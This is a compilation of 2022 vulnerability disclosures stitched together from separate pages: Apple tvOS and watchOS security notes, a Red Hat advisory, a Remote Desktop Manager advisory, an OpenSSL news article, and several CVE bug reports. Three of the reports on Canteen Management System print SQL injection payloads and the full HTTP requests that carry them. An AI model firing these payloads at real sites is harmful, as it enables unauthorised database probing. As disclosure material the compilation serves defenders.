A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 16, iOS 16, watchOS 9. An app may be able to execute arbitrary code with kernel privileges.

Released September 12, 2022

**Accelerate Framework**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: Processing a maliciously crafted image may lead to arbitrary code execution

Description: A memory consumption issue was addressed with improved memory handling.

CVE-2022-42795: ryuzaki

**AppleAVD**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: This issue was addressed with improved checks.

CVE-2022-32907: Natalie Silvanovich of Google Project Zero, Antonio Zekic (@antoniozekic) and John Aakerblom (@jaakerblom), ABC Research s.r.o, Yinyi Wu, Tommaso Bianco (@cutesmilee\_\_)

**GPU Drivers**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-32903: an anonymous researcher

**ImageIO**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: Processing an image may lead to a denial-of-service

Description: A denial-of-service issue was addressed with improved validation.

CVE-2022-1622

**Image Processing**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: A sandboxed app may be able to determine which app is currently using the camera

Description: The issue was addressed with additional restrictions on the observability of app states.

CVE-2022-32913: Yiğit Can YILMAZ (@yilmazcanyigit)

**Image Processing**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD 

Impact: An app may be able to execute arbitrary code with kernel privileges 

Description: This issue was addressed with improved checks. 

CVE-2022-32949: Tingting Yin of Tsinghua University

**Kernel**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An app may be able to disclose kernel memory

Description: The issue was addressed with improved memory handling.

CVE-2022-32864: Linus Henze of Pinauten GmbH (pinauten.de)

**Kernel**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-32866: Linus Henze of Pinauten GmbH (pinauten.de)

CVE-2022-32911: Zweig of Kunlun Lab

**Kernel**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-32914: Zweig of Kunlun Lab

**MediaLibrary**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: A user may be able to elevate privileges

Description: A memory corruption issue was addressed with improved input validation.

CVE-2022-32908: an anonymous researcher

**Notifications**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: A user with physical access to a device may be able to access contacts from the lock screen

Description: A logic issue was addressed with improved state management.

CVE-2022-32879: Ubeydullah Sümer

**Sandbox**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An app may be able to modify protected parts of the file system

Description: A logic issue was addressed with improved restrictions.

CVE-2022-32881: Csaba Fitzl (@theevilbit) of Offensive Security

**SQLite**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: A remote user may be able to cause a denial-of-service

Description: This issue was addressed with improved checks.

CVE-2021-36690

**WebKit**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A buffer overflow issue was addressed with improved memory handling.

WebKit Bugzilla: 241969  
CVE-2022-32886: P1umer(@p1umer), afang(@afang5472), xmzyshypnc(@xmzyshypnc1)

**WebKit**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: An out-of-bounds write issue was addressed with improved bounds checking.

WebKit Bugzilla: 242047  
CVE-2022-32888: P1umer (@p1umer)

**WebKit**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: An out-of-bounds read was addressed with improved bounds checking.

WebKit Bugzilla: 242762  
CVE-2022-32912: Jeonghoon Shin (@singi21a) at Theori working with Trend Micro Zero Day Initiative

**WebKit**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: Visiting a website that frames malicious content may lead to UI spoofing

Description: The issue was addressed with improved UI handling.

WebKit Bugzilla: 242762  
CVE-2022-32891: @real\_as3617, an anonymous researcher

**Wi-Fi**

Available for: Apple TV 4K, Apple TV 4K (2nd generation), and Apple TV HD

Impact: An app may be able to cause unexpected system termination or write kernel memory

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-32925: Wang Yu of Cyberserval

CVE-2022-32903: About the security content of tvOS 16

This issue was addressed with improved entitlements. This issue is fixed in iOS 16, watchOS 9. An app may be able to read a persistent device identifier.

Released September 12, 2022

**Accelerate Framework**

Available for: Apple Watch Series 4 and later

Impact: Processing a maliciously crafted image may lead to arbitrary code execution

Description: A memory consumption issue was addressed with improved memory handling.

CVE-2022-42795: ryuzaki

**AppleAVD**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: This issue was addressed with improved checks.

CVE-2022-32907: Natalie Silvanovich of Google Project Zero, Antonio Zekic (@antoniozekic) and John Aakerblom (@jaakerblom), ABC Research s.r.o, Yinyi Wu, Tommaso Bianco (@cutesmilee\_\_)

**Apple Neural Engine**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to leak sensitive kernel state

Description: The issue was addressed with improved memory handling.

CVE-2022-32858: Mohamed Ghannam (@\_simo36)

**Apple Neural Engine**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-32898: Mohamed Ghannam (@\_simo36)

CVE-2022-32899: Mohamed Ghannam (@\_simo36)

CVE-2022-32889: Mohamed Ghannam (@\_simo36)

**Contacts**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed with improved checks.

CVE-2022-32854: Holger Fuhrmannek of Deutsche Telekom Security

**Exchange**

Available for: Apple Watch Series 4 and later

Impact: A user in a privileged network position may be able to intercept mail credentials

Description: A logic issue was addressed with improved restrictions.

CVE-2022-32928: an anonymous researcher

**GPU Drivers**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-32903: an anonymous researcher

**ImageIO**

Available for: Apple Watch Series 4 and later

Impact: Processing an image may lead to a denial-of-service

Description: A denial-of-service issue was addressed with improved validation.

CVE-2022-1622

**Image Processing**

Available for: Apple Watch Series 4 and later

Impact: A sandboxed app may be able to determine which app is currently using the camera

Description: The issue was addressed with additional restrictions on the observability of app states.

CVE-2022-32913: Yiğit Can YILMAZ (@yilmazcanyigit)

**Kernel**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to disclose kernel memory

Description: The issue was addressed with improved memory handling.

CVE-2022-32864: Linus Henze of Pinauten GmbH (pinauten.de)

**Kernel**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-32866: Linus Henze of Pinauten GmbH (pinauten.de)

CVE-2022-32911: Zweig of Kunlun Lab

**Kernel**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-32914: Zweig of Kunlun Lab

**Kernel**

Available for: Apple Watch Series 4 and later

Impact: An application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited.

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-32894: an anonymous researcher

**Maps**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to read sensitive location information

Description: A logic issue was addressed with improved restrictions.

CVE-2022-32883: Ron Masas of breakpointhq.com

**MediaLibrary**

Available for: Apple Watch Series 4 and later

Impact: A user may be able to elevate privileges

Description: A memory corruption issue was addressed with improved input validation.

CVE-2022-32908: an anonymous researcher

**Notifications**

Available for: Apple Watch Series 4 and later

Impact: A user with physical access to a device may be able to access contacts from the lock screen

Description: A logic issue was addressed with improved state management.

CVE-2022-32879: Ubeydullah Sümer

**Sandbox**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to modify protected parts of the file system

Description: A logic issue was addressed with improved restrictions.

CVE-2022-32881: Csaba Fitzl (@theevilbit) of Offensive Security

**Siri**

Available for: Apple Watch Series 4 and later

Impact: A user with physical access to a device may be able to use Siri to obtain some call history information

Description: A logic issue was addressed with improved state management.

CVE-2022-32870: Andrew Goldberg of The McCombs School of Business, The University of Texas at Austin (linkedin.com/in/andrew-goldberg-/)

**SQLite**

Available for: Apple Watch Series 4 and later

Impact: A remote user may be able to cause a denial-of-service

Description: This issue was addressed with improved checks.

CVE-2021-36690

**Watch app**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to read a persistent device identifier

Description: This issue was addressed with improved entitlements.

CVE-2022-32835: Guilherme Rambo of Best Buddy Apps (rambo.codes)

**Weather**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to read sensitive location information

Description: A logic issue was addressed with improved state management.

CVE-2022-32875: an anonymous researcher

**WebKit**

Available for: Apple Watch Series 4 and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A buffer overflow issue was addressed with improved memory handling.

WebKit Bugzilla: 241969  
CVE-2022-32886: P1umer(@p1umer), afang(@afang5472), xmzyshypnc(@xmzyshypnc1)

**WebKit**

Available for: Apple Watch Series 4 and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: An out-of-bounds write issue was addressed with improved bounds checking.

WebKit Bugzilla: 242047  
CVE-2022-32888: P1umer (@p1umer)

**WebKit**

Available for: Apple Watch Series 4 and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: An out-of-bounds read was addressed with improved bounds checking.

WebKit Bugzilla: 242762  
CVE-2022-32912: Jeonghoon Shin (@singi21a) at Theori working with Trend Micro Zero Day Initiative

**WebKit**

Available for: Apple Watch Series 4 and later

Impact: Visiting a website that frames malicious content may lead to UI spoofing

Description: The issue was addressed with improved UI handling.

WebKit Bugzilla: 243236  
CVE-2022-32891: @real\_as3617, an anonymous researcher

**WebKit**

Available for: Apple Watch Series 4 and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.

Description: An out-of-bounds write issue was addressed with improved bounds checking.

WebKit Bugzilla: 243557  
CVE-2022-32893: an anonymous researcher

**Wi-Fi**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to cause unexpected system termination or write kernel memory

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-32925: Wang Yu of Cyberserval

CVE-2022-32835: About the security content of watchOS 9

Red Hat Advanced Cluster Management for Kubernetes 2.4.8 General
Availability release images, which fix security issues.
Red Hat Product Security has rated this update as having a security impact
of Moderate. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE links in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2022-2238: search-api: SQL injection leads to remote denial of service
* CVE-2022-25858: terser: insecure use of regular expressions leads to ReDoS
* CVE-2022-31129: moment: inefficient parsing algorithm resulting in DoS
* CVE-2022-35948: nodejs: undici vulnerable to CRLF via content headers
* CVE-2022-35949: nodejs: undici.request vulnerable to SSRF


Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Virtualization
*   Red Hat Identity Management
*   Red Hat Directory Server
*   Red Hat Certificate System
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Update Infrastructure
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat CloudForms
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Online
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   Red Hat CodeReady Workspaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Thorntail
*   Red Hat build of Eclipse Vert.x
*   Red Hat build of OpenJDK
*   Red Hat build of Quarkus

**Integration and Automation**

*   Red Hat Process Automation
*   Red Hat Process Automation Manager
*   Red Hat Decision Manager

All Products

Issued:

2022-11-01

Updated:

2022-11-01

**RHSA-2022:7276 - Security Advisory**

*   Overview
*   Updated Packages

**Synopsis**

Moderate: Red Hat Advanced Cluster Management 2.4.8 security fixes and container updates

**Type/Severity**

Security Advisory: Moderate

**Topic**

Red Hat Advanced Cluster Management for Kubernetes 2.4.8 General  
Availability release images, which fix security issues.  

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE links in the References section.

**Description**

Red Hat Advanced Cluster Management for Kubernetes 2.4.8 images  

Red Hat Advanced Cluster Management for Kubernetes provides the  
capabilities to address common challenges that administrators and site  
reliability engineers face as they work across a range of public and  
private cloud environments. Clusters and applications are all visible and  
managed from a single console—with security policy built in.  

This advisory contains the container images for Red Hat Advanced Cluster  
Management for Kubernetes, which fix several bugs. See the following  
Release Notes documentation, which will be updated shortly for this  
release, for additional details about this release:  

https://access.redhat.com/documentation/en-us/red\_hat\_advanced\_cluster\_management\_for\_kubernetes/2.4/html/release\_notes/

Security fixes:  

*   moment: inefficient parsing algorithm resulting in DoS (CVE-2022-31129)
*   nodejs: undici vulnerable to CRLF via content headers (CVE-2022-35948)
*   nodejs: undici.request vulnerable to SSRF (CVE-2022-35949)
*   terser: insecure use of regular expressions leads to ReDoS (CVE-2022-25858)
*   search-api: SQL injection leads to remote denial of service (CVE-2022-2238)

Bug fix:  

*   RHACM 2.4.8 images (BZ# 2130745)

**Affected Products**

*   Red Hat Advanced Cluster Management for Kubernetes 2 for RHEL 8 x86\_64
*   Red Hat Advanced Cluster Management for Kubernetes 2 for RHEL 7 x86\_64

**Fixes**

*   BZ - 2101669 - CVE-2022-2238 search-api: SQL injection leads to remote denial of service
*   BZ - 2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS
*   BZ - 2121068 - CVE-2022-35949 nodejs: undici.request vulnerable to SSRF
*   BZ - 2121101 - CVE-2022-35948 nodejs: undici vulnerable to CRLF via content headers
*   BZ - 2126277 - CVE-2022-25858 terser: insecure use of regular expressions leads to ReDoS
*   BZ - 2130745 - RHACM 2.4.8 images

**CVEs**

*   CVE-2020-35525
*   CVE-2020-35527
*   CVE-2022-0494
*   CVE-2022-1353
*   CVE-2022-2238
*   CVE-2022-2509
*   CVE-2022-2588
*   CVE-2022-3515
*   CVE-2022-23816
*   CVE-2022-23825
*   CVE-2022-25858
*   CVE-2022-29900
*   CVE-2022-29901
*   CVE-2022-31129
*   CVE-2022-34903
*   CVE-2022-35948
*   CVE-2022-35949
*   CVE-2022-37434
*   CVE-2022-38177
*   CVE-2022-38178
*   CVE-2022-40674
*   CVE-2022-41974

**Red Hat Advanced Cluster Management for Kubernetes 2 for RHEL 8**

SRPM

x86\_64

**Red Hat Advanced Cluster Management for Kubernetes 2 for RHEL 7**

SRPM

x86\_64

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

RHSA-2022:7276: Red Hat Security Advisory: Red Hat Advanced Cluster Management 2.4.8 security fixes and container updates

Canteen Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /print.php.

Permalink

**Canteen Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: 庞习铭

vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability File: /youthappam/print.php?id=

Vulnerability location: /youthappam/print.php?id=, id

dbname =youthappam,length=10

\[+\] Payload: /youthappam/print.php?id=1%27%20and%20length(database())%20=10--+ // Leak place ---> id

GET /youthappam/print.php?id\=1%27%20and%20length(database())%20\=10\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lf9hph2449vgrcadcct2jgd8ne
Connection: close

length = 10 

length = 9

CVE-2022-43329: bug_report/SQLi-1.md at main · YReyi/bug_report

Canteen Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /editorder.php.

Permalink

**Canteen Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: 庞习铭

vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability File: /youthappam/editorder.php?id=

Vulnerability location: /youthappam/editorder.php?id=, id

dbname =youthappam,length=10

\[+\] Payload: /youthappam/editorder.php?id=1%20and%20length(database())%20=10--+ // Leak place ---> id

GET /youthappam/editorder.php?id\=1%20and%20length(database())%20\=10\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lf9hph2449vgrcadcct2jgd8ne
Connection: close

length = 10 

length = 9

CVE-2022-43330: bug_report/SQLi-2.md at main · YReyi/bug_report

Database connections on deleted users could stay active on MySQL data sources in Remote Desktop Manager 2022.3.7 and below which allow deleted users to access unauthorized data. This issue affects : Remote Desktop Manager 2022.3.7 and prior versions.

*   Call me
*   Live Chat

*   Log in

Security & Compliance Reporting a Security Issue Advisories

**Affected Products**

Remote Desktop Manager 2022.3.7 and earlier.

**Change Log**

Initial publication - 2022-11-01

**Product**

Remote Desktop Manager

**Summary**

Database connections are not closed properly on MySQL data sources after a user is deleted which could allow them to access unauthorized data.

**Database connections for deleted users not closed on MySQL data sources**

**Description**

Database connections on deleted users could stay active on MySQL data sources in Remote Desktop Manager 2022.3.7 and below which allow deleted users to access unauthorized data.

**Remediation and Workarounds**

Upgrade to Remote Desktop Manager 2022.3.8 and later.

**Severity**

Medium - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

**Affected Products**

Remote Desktop Manager 2022.3.7 and earlier.

CVE-2022-3780: DEVO-2022-0008

Canteen Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /php_action/printOrder.php.

Permalink

**Canteen Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: 庞习铭

vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability File: /youthappam/php\_action/printOrder.php

Vulnerability location: /youthappam/php\_action/printOrder.php, id

dbname =youthappam,length=10

\[+\] Payload: orderId=1 and length(database()) = 10 // Leak place ---> id

POST /youthappam/php\_action/printOrder.php HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lf9hph2449vgrcadcct2jgd8ne
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
orderId=1 and length(database()) = 10

length = 10 

length = 9

CVE-2022-43331: bug_report/SQLi-3.md at main · YReyi/bug_report

Senayan Library Management System v9.4.2 was discovered to contain a SQL injection vulnerability via the collType parameter at loan_by_class.php.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-43362: [Security Bug] Boolean SQL Injection in loan_by_class.php · Issue #163 · slims/slims9_bulian

Punycode-related flaw fails the logo test

Punycode-related flaw fails the logo test

  

A much-anticipated security update from OpenSSL landed today (November 1) but its impact appears to be considerably less than developers initially feared.

OpenSSL 3.0.7 tackles two vulnerabilities in the cryptographic library (tracked as CVE-2022-3786 and CVE-2022-3602, respectively) and both involve X.509 email address buffer overflows.

OpenSSL versions between 3.0.0 and 3.0.6 are affected by the flaws – both of which were anticipated as “critical”, but were eventually classified as “high” risk.

“The bugs were introduced as part of punycode decoding functionality (currently only used for processing email address name constraints in X.509 certificates),” an FAQ by the developers of OpenSSL explains.

Catch up on the latest encryption-related news and analysis

Last week developers of OpenSSL took the unusual steps of warning of the looming “critical” vulnerability, the first issue to reach this level of severity since the infamous Heartbleed vulnerability (CVE-2014-0160) eight years ago.

Heartbleed was a memory handling bug that created a means for attackers to steal secret keys, passwords, and sensitive personal information from vulnerable systems.

**No Heartbleed?**

The latest flaws initially appeared to present a remote code execution (RCE) risk comparable to Heartbleed, but subsequent testing work has shown that stack overflow protections on modern platforms mitigate against potential malfeasance.

And, for some Linux distros, the stack overflow only leads to a currently unused portion of memory – useless from an attacker’s perspective.

BACKGROUND Upcoming ‘critical’ OpenSSL update prompts feverish speculation

Other as-yet-unidentified platforms might turn out to be at risk of greater exposure, but for now the impact of systems that rely on the almost ubiquitous cryptographic library would appear to be limited to denial of service (i.e. crashed programs).

Both updates only affect OpenSSL 3.0.x, a release line that debuted in 2021 – another factor that limits the scope of the whole problem.

**No logo**

There’s no indication that either of the flaws have been abused but even so it makes sense to audit systems for potential exposure to vulnerable versions of OpenSSL 3.0.x and, of course, to update software stacks. Users operating TLS servers may consider disabling TLS client authentication, as a workaround short of patching.

It could also be time to stand down from any heightened alert state due to concern about the effect of another Heartbleed-style vulnerability.

This vulnerability hasn’t even been branded in any way – perhaps, to some, the ultimate diss. “The OpenSSL project has not named or created logos for either CVE,” the developers said.

RECOMMENDED SQLite patches 22-year-old code execution, denial of service vulnerability

OpenSSL vulnerability downgraded to ‘high’ severity

A SQL injection vulnerability in the height and width parameter in NdkAdvancedCustomizationFields v3.5.0 allows unauthenticated attackers to exfiltrate database data.

Tag

#sql